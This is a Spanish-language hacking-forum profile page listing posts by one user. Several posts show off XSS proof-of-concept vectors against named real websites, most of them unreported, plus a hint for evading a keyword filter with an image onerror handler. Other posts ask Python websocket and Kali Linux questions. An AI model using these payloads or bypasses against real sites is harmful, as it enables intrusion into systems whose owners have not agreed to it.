Temas - Pytness

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Pytness

Páginas1

Hacking ShowOff / [XSS] pcxeon.com

Julio 15, 2017, 07:47:48 PM

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: '"><svg onload=alert('pytness')>
Reportado: No

Dudas y pedidos generales / Rotacion de pantalla [KALI]

Abril 12, 2017, 06:10:31 PM

Acabo de instalar Kali en una particion aparte y tras realizar todas las actualizaciones, la pantalla rota de vez en cuando.
Esto lo arreglo facilmente con el comando xrandr -o normal, pero al rato vuelve a rotarse.
Alguien sabe como solucionarlo? o en su defecto, alguien sabe por que sucede?

Gracias.

Hacking ShowOff / [XSS] Carta para los reyes magos (www.carta.es)

Diciembre 14, 2016, 08:10:50 AM

Imagenes:

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: <script>alert('XSS\nFrom Pytness\nTo Undercode\nWith Love <3');</script>*
Autor: Pytness
Ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado: No

*Es necesario poner todo el script en una sola linea

Hacking ShowOff / [XSS] Web Timo

Octubre 13, 2016, 04:35:50 PM

Imagen:

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: <h1 style="color:red">UNDERCODE And Pytness</h1>
Url + Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: Pytness
Reportado: Nope

Aparentemente parece funionar con php, pero lo hace con js. Es decir, si se deshabilita este, el xss no funcionará.

PD:
LA PÁGINA ES UN POCO TOCA NARICES, pero nada que no se pueda arreglar toqueteando un poco

Y ya ni comento lo que pone de fondo xD

PD-2:
En el timo original aparecia este numero de telefono: 932 20 23 38. Lo he 'denunciado' en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

... y la ip es totalmente falsa :T

Dudas y pedidos generales / PYTHON 3.5 Problema al recibir datos en websockets (Librería socket)

Septiembre 24, 2016, 09:07:18 PM

Buenas, he hecho un script en python 3.5 para realizar una conexión con websockets:
Python 3.5 code:

Código: python


import base64, hashlib
import socket, threading, time, os


class Connection:

    def __init__(self, HOST, PORT):
        self.HOST = HOST
        self.PORT = PORT
        self.magicKey = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


    def init(self):
        self.socket = socket.socket()
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind((self.HOST, self.PORT));
        self.socket.listen(1);
        self.conn, self.addr = self.socket.accept();

        h = self.conn.recv(1024).decode("utf-8")
        print(h)
        self.conn.send(bytes(self.header(h).encode("utf-8")))
        # threading.Thread(target = self.getData).start()
        threading.Thread(target = self.getData).start()

    def getKey(self, msg):
        msg = msg.split("\r\n")
        for x in msg:
            if x.count("Sec-WebSocket-Key") != 0:
                key = x.split(" ")[1]
                hash = hashlib.sha1()
                hash.update(bytes((key + self.magicKey).encode("utf-8")))
                return base64.b64encode(hash.digest()).decode("utf-8")

    def header(self, msg):
        finalKey = self.getKey(msg)
        print(finalKey)

        header = "HTTP/1.1 101 Switching Protocols\r\n"
        header += "Upgrade: websocket\r\n"
        header += "Connection: Upgrade\r\n"
        header += "Sec-WebSocket-Accept: " + finalKey + "\r\n"
        header += "\r\n"
        return header

    def getData(self):
        while True:
            data = self.conn.recv(1024)
            print(str(data))

    def sendData(self):
        # while True:
        enviar = bytes("Test \n".encode("utf-8"))
        self.conn.sendall(enviar)

connection = Connection("localhost", 7899)
connection.init()

JS Code:

Código: javascript


function send(data) {
	ws.send(data);
}

var op = document.getElementById("output");
op.innerHTML = '';

ws = new WebSocket('ws://localhost:7899');

ws.onopen = function (evt) {
	op.innerHTML += "Open <br>";
	send("test")
};
ws.onclose = function (evt) {
	op.innerHTML += "Closed <br>";
};
ws.onmessage = function (evt) {
	op.innerHTML += "<pre>" + evt.data + "</pre><br>";
};
ws.onerror = function (evt) {
	op.innerHTML += "Error <br>";
};

E aquí la respuesta que obtengo en la consola al conectarme:

Código: php


GET / HTTP/1.1

Host: localhost:7899

Connection: Upgrade

Pragma: no-cache

Cache-Control: no-cache

Upgrade: websocket

Origin: file://

Sec-WebSocket-Version: 13

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

DNT: 1

Accept-Encoding: gzip, deflate, sdch

Accept-Language: es-ES,es;q=0.8

Sec-WebSocket-Key: rrbq+deqlkTqFTSZ4qEyGQ==

Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits




TAPFySA27bL6vQ7S8bsd4ve14ZY=
b'\x81\x84\x95\x91P\x05\xe1\xf4#q'

El problema está en que yo mando con js 'test' y recibo b'\x81\x84\x95\x91P\x05\xe1\xf4#q' en consola.
He intentado decodificarlo a utf-8 pero da error.

Espero que sepan y puedan ayudarme.
Gracias.

-Pytness

Hacking ShowOff / [XSS] http://espinillo.org

Septiembre 08, 2016, 09:26:02 PM

Imagen:

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) - foro=(1-30)
Vector: '<h1 style="color: #ff001b">Underc0de</h1>' *
Autor: Pytness
Reportado: Si**

* Detecta varias palabras, tales como 'script', 'alert', 'write', 'getElementById'... Validacion Back-End, muestra una alerta de error.
-* Añadiendo una imagen con un src nulo y un onerror podemos cargar un script.

** Lo reporte hace meses y añadieron un 'filtro' de palabras (*). Lo he vuelto a reportar.

Dudas y pedidos generales / Problema con sockets y demas

Septiembre 06, 2016, 07:46:12 PM

Buenas.
Estoy haciendo a modo de aprendizaje un 'chat' (en Python 3.5.2) en el que utilizo hilos, websockets, sockets y 'asyncio'.

Para hacer la interfaz utilizo HTML y JS, que conecto a la consola mediante websockets. Estos son asíncronos, y los 'manejo' con un hilo.
Desde los websockets paso los datos a los sockets y estos se mandan al server.

[HTML + JS] <-> WebSockets <-> Sockets <-> Server

[Parte de websockets]

El problema es este:

Código: php


import asyncio
import threading
import websockets

async def server(websocket, path):

	threading.Thread(target=sendData, args=(websocket, path)).start()
 	threading.Thread(target=getData, args=(websocket, path)).start()

	# await getData(websocket, path)
	# await sendData(websocket, path)



async def getData(websocket, path):
		await print(websocket.recv())
		await asyncio.sleep(0.1)
	

def sendData(websocket, path):
	while True:
		websocket.send("data")
		asyncio.sleep(0.5)

start_server = websockets.serve(server, 'localhost', 7979)

asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()

Este código me da error al pasarle los argumentos en el hilo en el que invoco a getData().
#El sendData() esta sin el async para comprobar que falla

Son los argumentos requeridos, pero me dice que no se esperan y que espera dos argumentos :/

Creo que es debido a la forma de pasarle los argumentos al async desde el hilo.
El problema es que no se como pasárselos bien.

Podrian explicarme como solucionar esto?

Gracias.

Postdata: siento si este post esta mal colocado y si tengo algun error de novato, ya que lo soy :]

Páginas1